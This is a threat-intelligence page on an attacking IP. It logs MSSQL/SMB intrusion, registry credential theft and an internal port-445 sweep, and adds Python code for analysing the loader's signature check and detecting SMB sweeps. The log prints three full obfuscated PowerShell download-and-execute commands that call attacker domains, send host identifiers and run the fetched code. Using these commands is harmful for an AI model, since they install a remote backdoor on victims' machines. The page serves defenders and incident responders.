Cyber Threat Intelligence

Discover malicious IPs and domains with Akamai Guardicore Segmentation

IP Address: 111.254.60.45 (Previously Malicious)

This IP address attempted an attack on a machine in our threat sensor network

Threat Information

Role

Attacker, Scanner

Services Targeted

MSSQL, SMB

Tags

Execute MsSql Shell Command, Service Start, Unauthorized Credential Access, Successful SMB Login, MSSQL, SMB Share Connect, SMB File Operation By CMD, Scheduled Task Creation, Successful MSSQL Login, PowerShell, CMD

Associated Attack Servers

-

Basic Information

IP Address

111.254.60.45

Domain

-

ISP

HiNet

Country

Taiwan, Province of China

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Akamai Guardicore Segmentation

2021-05-24

Last seen in Akamai Guardicore Segmentation

2021-05-24

What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: White List

Successful MSSQL Login

A user logged in using SMB with the following username: Administrator - Authentication policy: Reached Max Attempts

Successful SMB Login

MSSQL executed 2 shell commands

Execute MsSql Shell Command

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: Previously Approved User (3 times)

Successful MSSQL Login

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com

DNS Query, Access Suspicious Domain, Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80

Outgoing Connection

The command line blackball was scheduled to run by modifying C:\Windows\System32\Tasks\blackball

The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Y65I2GFrmR7

Service msiserver was started

Service Start

PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe 2 times

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: d.u78wjdu.com

DNS Query, Access Suspicious Domain, Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.251.24:80, 192.168.0.0:445, 192.168.0.10:445, 192.168.0.11:445, 192.168.0.12:445, 192.168.0.13:445, 192.168.0.14:445, 192.168.0.15:445, 192.168.0.16:445, 192.168.0.17:445, 192.168.0.18:445, 192.168.0.19:445, 192.168.0.1:445, 192.168.0.20:445, 192.168.0.21:445, 192.168.0.22:445, 192.168.0.23:445, 192.168.0.24:445, 192.168.0.25:445, 192.168.0.26:445, 192.168.0.27:445, 192.168.0.28:445, 192.168.0.29:445, 192.168.0.2:445, 192.168.0.30:445, 192.168.0.31:445, 192.168.0.32:445, 192.168.0.33:445, 192.168.0.34:445, 192.168.0.35:445, 192.168.0.36:445, 192.168.0.37:445, 192.168.0.38:445, 192.168.0.39:445, 192.168.0.3:445, 192.168.0.40:445, 192.168.0.41:445, 192.168.0.42:445, 192.168.0.43:445, 192.168.0.44:445, 192.168.0.45:445, 192.168.0.46:445, 192.168.0.47:445, 192.168.0.48:445, 192.168.0.49:445, 192.168.0.4:445, 192.168.0.50:445, 192.168.0.51:445, 192.168.0.52:445, 192.168.0.53:445, 192.168.0.54:445, 192.168.0.55:445, 192.168.0.56:445, 192.168.0.57:445, 192.168.0.58:445, 192.168.0.59:445, 192.168.0.5:445, 192.168.0.60:445, 192.168.0.61:445, 192.168.0.62:445, 192.168.0.63:445, 192.168.0.64:445, 192.168.0.65:445, 192.168.0.66:445, 192.168.0.67:445, 192.168.0.68:445, 192.168.0.69:445, 192.168.0.6:445, 192.168.0.70:445, 192.168.0.71:445, 192.168.0.72:445, 192.168.0.73:445, 192.168.0.74:445, 192.168.0.75:445, 192.168.0.76:445, 192.168.0.77:445, 192.168.0.78:445, 192.168.0.79:445, 192.168.0.7:445, 192.168.0.80:445, 192.168.0.81:445, 192.168.0.82:445, 192.168.0.83:445, 192.168.0.84:445, 192.168.0.85:445, 192.168.0.86:445, 192.168.0.87:445, 192.168.0.8:445, 192.168.0.9:445 and 54.225.222.160:443

Outgoing Connection

The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zke'+'r9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\C2jb0ZVDuPs\6mnCxpb4

The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\olBv8pfZ3X\1JvNPpZEKa
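The three scheduled-task one-liners above differ only in the download domain and share one mechanism: fetch the URL, treat the first 172 characters of the response as a base64 RSA signature, verify the remainder (from byte 173) against a hard-coded 1024-bit public key with RSACryptoServiceProvider.VerifyData (RSA PKCS#1 v1.5 over SHA-1), and only then pass it to Invoke-Expression. The effect is that a sinkholed or hijacked domain cannot feed this loader a substitute payload without the operator's private key. The Python below reimplements that parse-and-verify step so a captured response can be checked offline against the embedded key. It is an added example, not code from the page or from Akamai; the modulus constant is copied from the commands above, while the pure-Python RSA key generation, the `make_demo_keypair`/`sign_stage` helpers and the stage body are constructed here only so the verifier can be exercised end to end (the operator's private key is of course not available).

```python
import base64
import binascii
import hashlib
import random

# RSA public key hard-coded in the loader (copied from the command lines above): 1024-bit modulus, e = 65537.
LOADER_MODULUS_B64 = "2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10="
LOADER_MODULUS = int.from_bytes(base64.b64decode(LOADER_MODULUS_B64), "big")
LOADER_EXPONENT = 65537   # $p.Exponent = 0x01,0x00,0x01

SIG_B64_LEN = 172   # $d[0..171]: 128 signature bytes encoded as 172 base64 characters
BODY_OFFSET = 173   # $d[173..$c]: byte 172 is a separator the loader skips

# DER DigestInfo prefix for SHA-1, as EMSA-PKCS1-v1_5 requires (RFC 8017, section 9.2)
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")


def emsa_pkcs1_v15_sha1(message: bytes, em_len: int) -> bytes:
    """Encoded message that RSACryptoServiceProvider.VerifyData(..., SHA1) expects under the signature."""
    t = SHA1_DIGESTINFO + hashlib.sha1(message).digest()
    return b"\x00\x01" + b"\xff" * (em_len - len(t) - 3) + b"\x00" + t


def split_stage(blob: bytes):
    """Cut a fetched response exactly as the loader does: 172 base64 chars, one separator byte, the script."""
    if len(blob) <= BODY_OFFSET:   # mirrors `if($c -gt 173)`
        raise ValueError("response too short to hold a signature and a body")
    return base64.b64decode(blob[:SIG_B64_LEN]), blob[BODY_OFFSET:]


def verify_stage(blob: bytes, n: int = LOADER_MODULUS, e: int = LOADER_EXPONENT) -> bool:
    """True only if the body carries a valid RSA PKCS#1 v1.5 / SHA-1 signature under (n, e): the loader's IEX gate."""
    try:
        sig, body = split_stage(blob)
    except (ValueError, binascii.Error):
        return False
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    s = int.from_bytes(sig, "big")
    if s >= n:
        return False
    return pow(s, e, n).to_bytes(k, "big") == emsa_pkcs1_v15_sha1(body, k)


# Everything below exists only to build a positive sample with a throwaway key (constructed for this example).

def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin; adequate for a demo key, not for production key generation."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        c = random.getrandbits(bits) | (1 << (bits - 1)) | 1   # force top bit and oddness
        if _is_probable_prime(c):
            return c


def make_demo_keypair(bits: int = 1024):
    """Hypothetical 'operator' key pair; 1024 bits so the loader's fixed 172/173 offsets line up."""
    e = LOADER_EXPONENT
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), pow(e, -1, phi)


def sign_stage(body: bytes, n: int, d: int) -> bytes:
    """Produce a response in the loader's wire format: base64(signature) + separator + body."""
    k = (n.bit_length() + 7) // 8
    s = pow(int.from_bytes(emsa_pkcs1_v15_sha1(body, k), "big"), d, n)
    sig_b64 = base64.b64encode(s.to_bytes(k, "big"))
    assert len(sig_b64) == SIG_B64_LEN
    return sig_b64 + b"\n" + body


def demo():
    (n, e), d = make_demo_keypair()
    body = b"Write-Host 'constructed second stage'"         # stand-in for a real a.jsp response
    blob = sign_stage(body, n, d)
    genuine = verify_stage(blob, n, e)                        # signed with the matching key -> would run
    tampered = blob[:BODY_OFFSET] + b"Write-Host 'swapped'"  # body replaced behind a sinkhole -> rejected
    swapped = verify_stage(tampered, n, e)
    foreign = verify_stage(blob)                              # same blob under the real loader key -> rejected
    return genuine, swapped, foreign


if __name__ == "__main__":
    print(demo())
```

To check a real capture, read the raw HTTP body of the `a.jsp` response as bytes and call `verify_stage(data)` with the defaults: a `True` result confirms the file is a stage signed by the same operator key as these tasks, which is a stronger link than the URL pattern alone.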

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zz3r0.com

DNS Query, Access Suspicious Domain

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com

DNS Query, Access Suspicious Domain, Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80

Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zker9.com

DNS Query, Access Suspicious Domain

c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to extract credentials from Windows Registry 69 times

Unauthorized Credential Access

Process netsvcs Service Group started listening on ports: 65529

Listening

Process c:\windows\system32\ipconfig.exe attempted to access suspicious domains: d.u78wjdu.com, t.bb3u9.com, t.zker9.com and t.zz3r0.com

DNS Query, Access Suspicious Domain

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access domains: api.ipify.org and ctldl.windowsupdate.com

DNS Query

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe scanned port 445 on 88 IP Addresses

Port 445 Scan
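The outgoing-traffic event and the port 445 scan above show the lateral-movement phase: the same powershell.exe that fetched the stages walked 192.168.0.0/24 on TCP 445 while also reaching a few public hosts on 80 and 443. One way to catch that pattern from connection records of this shape is to count distinct private destinations on 445 per process and separate them from the public endpoints, which are the download and C2 candidates worth pivoting on. The Python below is an added example, not Akamai's detection logic; it parses a constructed event line written in the same format as the one above (shortened to ten internal targets), and the sweep threshold of eight hosts is an assumed tuning value.

```python
import ipaddress
import re

# Constructed sample in the same format as the "generated outgoing network traffic to:" event above,
# shortened to ten internal hosts (the real event lists 88 of them plus three public endpoints).
SAMPLE_EVENT = (
    "Process c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe generated outgoing network "
    "traffic to: 138.68.251.24:80, 192.168.0.1:445, 192.168.0.2:445, 192.168.0.3:445, 192.168.0.4:445, "
    "192.168.0.5:445, 192.168.0.6:445, 192.168.0.7:445, 192.168.0.8:445, 192.168.0.9:445, "
    "192.168.0.10:445 and 54.225.222.160:443"
)

EVENT_RE = re.compile(r"Process (\S+) generated outgoing network traffic to: (.*)$")
ENDPOINT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def parse_event(line: str):
    """Return (process, [(ip, port), ...]) from one outgoing-traffic event line."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError("not an outgoing-traffic event")
    process, rest = m.group(1), m.group(2)
    # entries are separated by ", " with a final " and "; the regex tolerates both
    endpoints = [(ip, int(port)) for ip, port in ENDPOINT_RE.findall(rest)]
    return process, endpoints


def classify(endpoints, sweep_threshold: int = 8):
    """Flag an SMB sweep (many distinct private hosts on 445) and list the public endpoints separately."""
    private_445 = {ip for ip, port in endpoints
                   if port == 445 and ipaddress.ip_address(ip).is_private}
    public = sorted({(ip, port) for ip, port in endpoints
                     if not ipaddress.ip_address(ip).is_private})
    return {
        "smb_sweep": len(private_445) >= sweep_threshold,
        "internal_smb_targets": len(private_445),
        "public_endpoints": public,
    }


def analyze(line: str):
    process, endpoints = parse_event(line)
    result = classify(endpoints)
    result["process"] = process
    return result


if __name__ == "__main__":
    print(analyze(SAMPLE_EVENT))
```

A scripting host such as powershell.exe has no business opening 445 to dozens of neighbours within seconds; on the real event the counter reaches 88, far beyond any sensible threshold, and the two public endpoints it isolates (138.68.251.24:80 and 54.225.222.160:443) are the ones to block and hunt for elsewhere.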

Connection was closed due to timeout